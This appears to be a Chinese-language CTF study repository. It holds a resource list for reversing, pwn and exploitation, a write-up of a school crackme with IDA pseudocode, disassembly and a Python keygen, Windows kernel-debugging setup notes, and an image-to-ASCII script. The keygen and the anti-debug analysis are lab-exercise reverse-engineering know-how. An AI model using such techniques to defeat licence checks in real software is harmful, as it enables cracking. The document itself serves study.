42 | 7. [LiveOverFlow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) youtube有相关视频 从他的视频学了不少
43 | 8. [CTF writeup](https://github.com/ctfs) 各种writeup (大多国外)
44 | 45 | ### CTFer-bin 46 | - [muhe](http://o0xmuhe.me/)
47 | - [hackfun](https://www.hackfun.org/)
48 | 49 | - xidian 50 | - [Icemakr](http://0byjwzsf.me/) LCTF2016 pwn出题大大
51 | - [Zing](http://l-team.org/)
52 | - [math1as](http://www.math1as.com/) 原来这个dalao是西电的啊 - - 有pwnable wp
53 | - [sh3ll](http://sh3ll.me/)
54 | - [tang](http://bigtang.org/)
55 | - [uaf](http://uaf.io/) 国外一位,各种ctf wp都有他的身影 56 | 57 | ### Books 58 | 1. [深入理解计算机系统](https://github.com/Urinx/Books/blob/master/cs/%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%B3%BB%E7%BB%9F.pdf) 涉及基本linux相关和语言
59 | 一些笔记 [1](http://blog.sina.com.cn/s/blog_6874dd910101l3lx.html), [2](https://www.gitbook.com/book/xxg1413/csapp/details), [3](http://wdxtub.com/2016/04/16/thin-csapp-0/) 60 | 2. [Linux程序设计/Beginning Linux Programming](http://www.ituring.com.cn/book/171) 开发是很有必要的
61 | 3. [鸟哥的linux私房菜](http://cn.linux.vbird.org/)
要学linux相关机制和命令的很不错的一本
62 | 63 | ## 3.Exploit 64 | 漏洞实战 计划最近进行 QAQ 65 | ### Reference sites 66 | 1. [ninehackers](http://www.ninehackers.com/) 有很多exploit开发的文章
67 | 2. 泉哥 68 | [riusksk](http://riusksk.me/) 《漏洞战争》作者
69 | 3. 余弦
70 | - [evilcos](http://evilcos.me/) 有技能表
71 | - [known-知道创宇](http://blog.knownsec.com/) 可以学点哲学
72 | - [懒人在思考](https://zhuanlan.zhihu.com/evilcos)
73 | 4. [腾讯玄武实验室](http://xlab.tencent.com/cn/) 漏洞发布
74 | 5. [netfairy](http://www.netfairy.net/)
75 | 6. [See bugs](https://www.seebug.org/)
76 | 7. [Black Hat](https://www.blackhat.com/)
77 | 8. [FreeBuf](http://freebuf.com/)
78 | 79 | ### Resource sites 80 | 1. [Old Version Downloads](http://www.oldapps.com) 老版OS和软件 研究漏洞很有用
81 | 2. [Old OS](http://www.oldversion.com) 同上
82 | 3. [Flash](http://www.abysssec.com/blog/2011/04/18/exploiting-adobe-flash-player-on-windows-7/) flash漏洞研究
83 | 4. [基础漏洞分析](http://ensiwiki.ensimag.fr/images/6/61/SecurIMAG-2011-11-17-teach-a_long_way_from_browser_vulnerability_to_kernel_exploitation.pdf) CVE-2010-0094/CVE-2010-3081 分析
84 | 85 | ### Books 86 | 1. [0day漏洞]()
87 | 2. [漏洞战争-配套资料](https://github.com/riusksk/vul_war) 书淘宝都直接找 漏洞分析cve等 很难
88 | 89 | ## 4.Hardware 90 | 硬件方面由于稍微写过点,不过安全方面没研究过
91 | 92 | ### Books 93 | 1. [0day路由器](http://item.jd.com/11734639.html) 没看过 应该很6
94 | 2. [无线电安全](https://item.jd.com/10340018520.html)
95 | 96 | ### Sites 97 | 1. [Hardware Sec](http://www.sp3ctr3.me/hardware-security-resources/) 资料推荐= = 很高大上
98 | 2. [Scanline dalao](http://scanlime.org/) 艺术家+硬件hacker
99 | 3. [Mouse Crack](https://github.com/BastilleResearch/mousejack) 无线鼠标键盘的
100 | 4. [路由器](http://www.routerpwn.com/) 路由器安全论坛
101 | 5. [openwrt](https://openwrt.org/) 路由器固件
102 | 103 | ## 5.CTFs 104 | 1. [cumt sec](http://www.bxsteam.xyz/) cumt的 为自己学校奶一口
105 | 2. [ISCC](http://lazymind.me/2016/05/iscc-2016-ctf-writeup/) 这里只有一部分
106 | 3. [CTFs](https://github.com/ctfs) 各种wp
107 | 4. [IDF 实验室](http://ctf.idf.cn/) 有一些基础的re
108 | 5. [CTF Time](https://ctftime.org/) 国外的ctfs 有难度orz
109 | 110 | ## 6.catalog 111 | ### 1 ./Reverse 112 | 做的少了 = = 基本之前做的都没有上传
113 | - ./driver 114 | 基本驱动调试环境配置
115 | 116 | ### 2 ./Pwn 117 | 关于pwn的题目和练习资源
118 | 119 | - ./examples 120 | 一些基本技巧
121 | - ./pwnable 122 | 一个很好的练习平台 不过没做多少
123 | - ./examples 124 | 典型的利用例子
125 | - ./c++ keywords 126 | 一些数的取值范围
127 | 128 | 129 | ## change 130 | 131 | 新建`CTFs`,之后大部分在`CTFs`里面放比赛的一些题. 132 | -------------------------------------------------------------------------------- /Reverse/README.md: -------------------------------------------------------------------------------- 1 | # 做re需要耐心 2 | 3 | ## exercises 4 | [re.kr](http://reversing.kr/index.php) 5 | 6 | ## resources 7 | IDA Pro 8 | 9 | -------------------------------------------------------------------------------- /Reverse/cumt2016_re3/03.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | alph1 = "onhtxdsqvpzcrefjigklfzbapvdqsxzrcefimlku" 3 | alph2 = "zscbmdvholblzftuhsxsbchanrcdqjvqfinotcbu" 4 | alph3 = "pzywrvdcbqeuafsxgmlitnkopvdqsxtdnapcuwys" 5 | 6 | username = "041751300132" 7 | pwd1 = "" 8 | pwd2 = "" 9 | pwd3 = "" 10 | 11 | ad1_1 = 0 12 | ad1_2 = 0 13 | ad1 = 10*(ad1_1 + 2 * ad1_2) 14 | #10 * (bIsIda + 2 * bOD_52pojie) 15 | ad2_1 = 1 16 | ad2_2 = 1 17 | ad2 = 10*(ad2_1 + 2 * ad2_2) 18 | #5 * (v3 + 2 * v2) + 2 19 | ad3_1 = 0 20 | ad3_2 = 1 21 | ad3 = 10*(ad3_1 + 2 * ad3_2) 22 | 23 | password = "" 24 | 25 | for s in username: 26 | index = int(s) 27 | pwd1 += alph2[ad1+index] 28 | pwd2 += alph3[ad2+index] 29 | pwd3 += alph1[ad3+index] 30 | 31 | passwd = pwd1[0:4] + pwd2[4:8] + pwd3[8:12] 32 | 33 | for s in passwd: 34 | if s == 'z': 35 | password += 'a' 36 | else: 37 | password += chr(ord(s) + 1) 38 | 39 | print password 40 | 41 | 42 | -------------------------------------------------------------------------------- /Reverse/cumt2016_re3/README.md: -------------------------------------------------------------------------------- 1 | ###reverse03: 2 | 闲着无聊 做了学校的ctf平台的一题(之前遗留了) 3 | 先uxp脱壳 然后拖进ida 4 | 主要代码如下 5 | ```C++ 6 | falgDug = 0; 7 | inUser = 0; // [bp-14h] 开始依次 48, 52, 49, 55, 53, 49, 51, 48, 48, 49, 51, 50 8 | v_13h = 0; 9 | v_Fh = 0; 10 | v22 = 0; 11 | v23 = 0; 12 | inPass = 0; 13 | v13 = 0; 14 | v14 = 0; 15 | v15 = 0; 16 | v16 = 0; 17 | v17 = 0; 18 | v18 = 0; 
19 | printf("输入用户名:"); 20 | scanf("%15s", &inUser); 21 | printf("\n"); 22 | printf("输入密码:"); 23 | scanf("%25s", &inPass); 24 | iU = strlen(&inUser); 25 | for ( i = 0; i < iU; ++i ) 26 | { 27 | if ( *(&inUser + i) < '0' || *(&inUser + i) > '9' ) 28 | { 29 | printf("用户名必须为数字"); 30 | goto LABEL_13; 31 | } 32 | } 33 | v9 = GetTickCount(); 34 | v5 = &loc_401052; 35 | IsOver = 0x40; 36 | do 37 | { // check int 38 | if ( !IsOver ) 39 | break; // 检测int3断点防止调试 40 | getInt3 = *(_BYTE *)v5 == 0xCCu; 41 | v5 = (char *)v5 + 1; 42 | --IsOver; 43 | } 44 | while ( !getInt3 ); 45 | if ( getInt3 ) 46 | falgDug = 1; 47 | isInt = (GetTickCount() - v9) / 0x3E8 > 1; // 判断时间,防止调试 48 | produceAlph1(falgDug, (int)&inUser, isInt); 49 | produceAlph2((char *)&v_13h + 3); 50 | produceAlph3((char *)&v_Fh + 3); 51 | checkPassword(&inPass); 52 | LABEL_13: 53 | system("pause"); 54 | return 0; 55 | ``` 56 | 看到解密的数组列表 57 | ```C++ 58 | alph1='onhtxdsqvpzcrefjigklfzbapvdqsxzrcefimlku'
59 | alph2='zscbmdvholblzftuhsxsbchanrcdqjvqfinotcbu'
60 | alph3='pzywrvdcbqeuafsxgmlitnkopvdqsxtdnapcuwys'
61 | 这里是在ida里算偏移算出来的
62 | username:041751300132
63 | 对应位置为
64 | bp-[h] 14 13 12 11 10 0f 0e 0d 0c 0b 0a 09
65 | // 48, 52, 49, 55 53, 49, 51, 48 48, 49, 51, 50
66 | ``` 67 | 注意到 68 | ```C++ 69 | produceAlph1中有个检测int3断点的程序,防止OD调试 70 | v9 = GetTickCount(); 71 | v5 = &loc_401052; 72 | IsOver = 0x40; 73 | do 74 | { // check int 75 | if ( !IsOver ) 76 | break; // 检测int3断点防止调试 77 | getInt3 = *(_BYTE *)v5 == 0xCCu; 78 | v5 = (char *)v5 + 1; 79 | --IsOver; 80 | } 81 | while ( !getInt3 ); 82 | if ( getInt3 ) 83 | falgDug = 1; 84 | ``` 85 | ### IDA伪指令解析错误: 86 | 87 | 怎么写脚本调都不对,问了学长,flag对了,但是伪C代码逻辑有改地方不对,找了半天 88 | ``` C++ 89 | f_8 = *((_BYTE *)&aIdaq64_exe[5 * (isDbg + 2 * (unsigned __int8)isFsd) + 2] + *(_BYTE *)pThis); 90 | //反过去汇编才发现ida F5解析错了 应该是: 91 | //*((_BYTE *)&aIdaq64_exe[2 * 5 * (isDbg + 2 * (unsigned __int8)isFsd)]才对吧 92 | ``` 93 | 好坑啊,直接上汇编吧 94 | ```asm 95 | .text:00401420 var_4 = dword ptr -4 96 | .text:00401420 97 | .text:00401420 push ebp 98 | .text:00401421 mov ebp, esp 99 | .text:00401423 push ecx 100 | .text:00401424 push ebx 101 | .text:00401425 push esi 102 | .text:00401426 mov esi, ecx 103 | .text:00401428 mov [ebp+var_4], 0 ; var_4 = 0 104 | .text:0040142F mov cl, 1 105 | .text:00401431 mov eax, large fs:'0' 106 | .text:00401437 mov eax, [eax+68h] ; eax += fs:'0' 107 | .text:0040143A mov [ebp+var_4], eax 108 | .text:0040143D test byte ptr [ebp+var_4], 'p' 109 | .text:00401441 mov eax, 0 110 | .text:00401446 movzx ebx, cl ; if (var_4 == 'p') ebx = 1 111 | .text:00401446 ; else ebx = 0 112 | .text:00401449 cmovnz ebx, eax 113 | .text:0040144C call ds:IsDebuggerPresent 114 | .text:00401452 neg eax ; if (IsDebuggerPresent) eax = 1 115 | .text:00401452 ; else eax = 0 116 | .text:00401454 movzx ecx, bl ; 设isFsd = bl 117 | .text:00401457 sbb eax, eax 118 | .text:00401459 neg eax ; 设isDbg = eax 119 | .text:0040145B lea eax, [eax+ecx*2] ; eax = isDbg + 2*isFsd 120 | .text:0040145E lea ecx, [eax+eax*4] ; ecx = 5*(eaxL) = 5*(isDbg + 2*isFsd) 121 | .text:00401461 movsx eax, byte ptr [esi] 122 | .text:00401464 movzx eax, byte ptr [eax+ecx*2+4021A0h] ; 2*ecx = 2*5*(isDbg + 2*isFsd) = 10*(isDbg + 2*isFsd) 123 | .text:0040146C 
mov f_8, al ; 当 isDbg=0 isFsd=1 该值为 10*2-20 124 | .text:0040146C ; 和ad3_1 = 0 125 | .text:0040146C ; ad3_2 = 1 126 | .text:0040146C ; ad3 = 5*(ad3_1 + 2 * ad3_2 + 2) = 20 一致 127 | .text:00401471 movsx eax, byte ptr [esi+1] 128 | .text:00401475 movzx eax, byte ptr [eax+ecx*2+4021A0h] 129 | .text:0040147D mov f_9, al 130 | .text:00401482 movsx eax, byte ptr [esi+2] 131 | .text:00401486 movzx eax, byte ptr [eax+ecx*2+4021A0h] 132 | .text:0040148E mov f_10, al 133 | .text:00401493 movsx eax, byte ptr [esi+3] 134 | .text:00401497 pop esi 135 | .text:00401498 pop ebx 136 | .text:00401499 movzx eax, byte ptr [eax+ecx*2+4021A0h] 137 | .text:004014A1 mov f_11, al 138 | .text:004014A6 mov esp, ebp 139 | .text:004014A8 pop ebp 140 | .text:004014A9 retn 141 | .text:004014A9 produceAlph3 endp 142 | 143 | ( 144 | neg r 指令的结果是设置Carry Flag, 也就是借位的标志位. 因为neg r的操作语义是0 - r, 零减去任何非零的数,都会产生"借位"的. 当然这里r寄存器中的值也被改掉了,不过没关系, 反正它都要被稍后的指令再改掉的. 145 | sbb r, r 指令设置r为零或者-1. 因为语义为用一个值去减掉它自身, 结果当然是零啰. 但是,这样做会把carry flag一起给减掉的, 该指令的公式是 146 | r – r – CF –> r 147 | 148 | 为零(ZF=1) CMOVZ AX, BX 149 | CMOVZ r32, r/m32 CMOVZ EAX, EB 150 | ) 151 | ``` 152 | #### 推广 153 | 题目来自:http://219.219.60.244/challenges.php 普普通通的逆向 154 | -------------------------------------------------------------------------------- /Reverse/cumt2016_re3/reverse03.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Reverse/cumt2016_re3/reverse03.exe -------------------------------------------------------------------------------- /Reverse/cumt2016_re3/reverse03.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Reverse/cumt2016_re3/reverse03.idb -------------------------------------------------------------------------------- /Reverse/driver/README.md: 
-------------------------------------------------------------------------------- 1 | 2 | ## Preface 3 | 4 | 一直没有接触windows驱动,这里稍微学习一下 5 | 6 | ## 配置环境 7 | 8 | 配置环境一直是很麻烦的事情,后来终于找到一个很方便的方法<br>
9 | 详见[fuzzysecurity kernel exp](http://www.fuzzysecurity.com/tutorials/expDev/14.html)
10 | 11 | 主机:Windows10 64bit
12 | target:Windows10 64bit
13 | 调试工具:windbg64bit 14 | 15 | ### 安装 16 | 17 | 首先需要到官网下载visual studio和winsdk
18 | 19 | ### 目标机设置 20 | 21 | 直接安装VirtualKD 中target的vminstall.exe
22 | 完成后重启系统,因为用的是win10调试,所以开机应该按F8进入免数字签名模式。
23 | 24 | ### debug 25 | 26 | 1. 打开 vmmon64.exe
27 | 2. 设置 28 | ![windbg setup](vmmwindbg.png) 29 | 点击Debugger path设置为64为windbg的位置。 30 | 3. windbg运行之后,在起点就断下了 31 | 32 | ## summary 33 | 简单的调试环境就配置好了,有工具就是简单 34 | ### other 35 | 此外,还可以设置ida来调试
36 | 详见[ida+windbg](http://ydc1992.github.io/2016/12/05/IDA-6-8-VirtualKD-WINDBG%E8%B0%83%E8%AF%95%E5%86%85%E6%A0%B8/)
37 | http://bobao.360.cn/learning/detail/3399.html
38 | -------------------------------------------------------------------------------- /Reverse/driver/vmmwindbg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Reverse/driver/vmmwindbg.png -------------------------------------------------------------------------------- /pic2ascii.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | #coding:utf-8 3 | from PIL import Image 4 | import optparse 5 | 6 | ascii_list = list(r"$@&%B#=-. ") 7 | 8 | # RGB to char 9 | def rgb2char(r, g, b): 10 | gray = int((19595 * r + 38469 * g + 7472 * b) >> 16) # ‘RGB-灰度值’转换公式 11 | unit = 256.0/len(ascii_list) # ascii_char中的一个字符所能表示的灰度值区间 12 | return ascii_list[int(gray/unit)] 13 | 14 | def prod_ascii(imgfile, outfile, width, height): 15 | f = open(outfile, 'wr') 16 | im = Image.open(imgfile) 17 | 18 | im = im.resize((width, height), Image.NEAREST) 19 | str_asc = "" 20 | 21 | for h in xrange(height): 22 | for w in xrange(width): 23 | str_asc += rgb2char(*im.getpixel((w, h))[:3]) 24 | str_asc += '\n' 25 | 26 | f.write(str_asc) 27 | f.close() 28 | 29 | 30 | def main(): 31 | parser = optparse.OptionParser('usage %prog -i -o -w -l '); 32 | parser.add_option('-i', dest='imgfile', type='string', help='specify input image file name') 33 | parser.add_option('-o', dest='outfile', type='string', help='specify output ascii file name') 34 | parser.add_option('-w', dest='width', type='string', help='specify output width') 35 | parser.add_option('-l', dest='height', type='string', help='specify output height') 36 | (options, args) = parser.parse_args() 37 | imgfile = options.imgfile 38 | outfile = options.outfile 39 | width = options.width 40 | height = options.height 41 | if (imgfile == None) | (outfile == None) | (width == None) | (height == None): 42 | print parser.usage 43 | exit(0) 44 | width = int(width) 45 
| height = int(height) 46 | prod_ascii(imgfile, outfile, width, height) 47 | 48 | 49 | if __name__ == '__main__': 50 | main() 51 | 52 | 53 | 54 | --------------------------------------------------------------------------------